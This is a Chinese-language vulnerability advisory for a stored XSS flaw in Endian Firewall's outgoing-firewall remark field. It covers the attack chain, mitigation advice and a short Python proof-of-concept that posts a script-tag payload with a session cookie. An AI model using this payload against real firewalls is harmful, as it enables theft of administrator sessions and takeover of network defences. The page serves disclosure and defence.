CVE-2026-34808 CVSS 6.4 中危

CVE-2026-34808 Endian Firewall 存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34808

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及更早版本在/cgi-bin/outgoingfw.cgi接口中存在存储型跨站脚本（XSS）漏洞。由于remark参数缺乏有效的输入验证和输出编码，经过身份验证的攻击者可以注入任意JavaScript代码。该恶意代码会被存储在服务器端，当其他用户（如管理员）访问受影响页面时，代码将在其浏览器中执行，可能导致窃取会话凭证或执行恶意操作。

技术细节

该漏洞源于Endian防火墙在处理出站防火墙规则备注时的安全缺失。具体而言，/cgi-bin/outgoingfw.cgi脚本在接收remark参数时，未对特殊字符（如<, >, /）进行过滤或转义，直接将其存储。攻击者利用低权限账号登录后，可构造包含HTML标签和JavaScript代码的恶意Payload。该Payload被持久化存储后，一旦管理员或其他用户浏览相关配置页面，浏览器便会解析该恶意代码并执行。由于是在管理员上下文中执行，攻击者可借此提升权限、篡改系统配置或窃取敏感数据。这种存储型XSS漏洞具有持久性，攻击载荷长期存在，只要用户访问特定URL即可触发，无需再次交互。此外，结合其他社会工程学手段，攻击者可诱导管理员尽快访问页面，从而快速控制防火墙系统，对网络安全边界造成严重破坏。

攻击链分析

STEP 1

步骤1

攻击者获取Endian Firewall的低权限账户凭证并进行登录。

STEP 2

步骤2

攻击者向/cgi-bin/outgoingfw.cgi接口发送POST请求，在remark参数中注入恶意JavaScript代码。

STEP 3

步骤3

服务器将未经过滤的恶意脚本存储在系统后台或数据库中。

STEP 4

步骤4

管理员或具有高权限的用户访问包含该remark内容的防火墙管理页面。

STEP 5

步骤5

受害者的浏览器解析页面并执行注入的脚本，导致攻击者窃取Cookie或执行管理操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/cgi-bin/outgoingfw.cgi"

# Attacker's authenticated session cookie (required)
cookies = {
    "sid": "valid_session_id_here"
}

# Malicious payload injected into the 'remark' parameter
payload = {
    "remark": "<script>alert(document.cookie);</script>",
    "action": "save"
}

# Sending the POST request to store the XSS
response = requests.post(url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("Payload injected successfully. XSS stored.")
else:
    print("Failed to inject payload.")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

在无法立即升级的情况下，管理员应限制对防火墙管理界面的访问权限，仅允许可信IP访问。同时，可以在服务器端对remark字段的输入进行正则匹配拦截，删除或转义<, >, ', ", &等危险字符，防止脚本注入。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表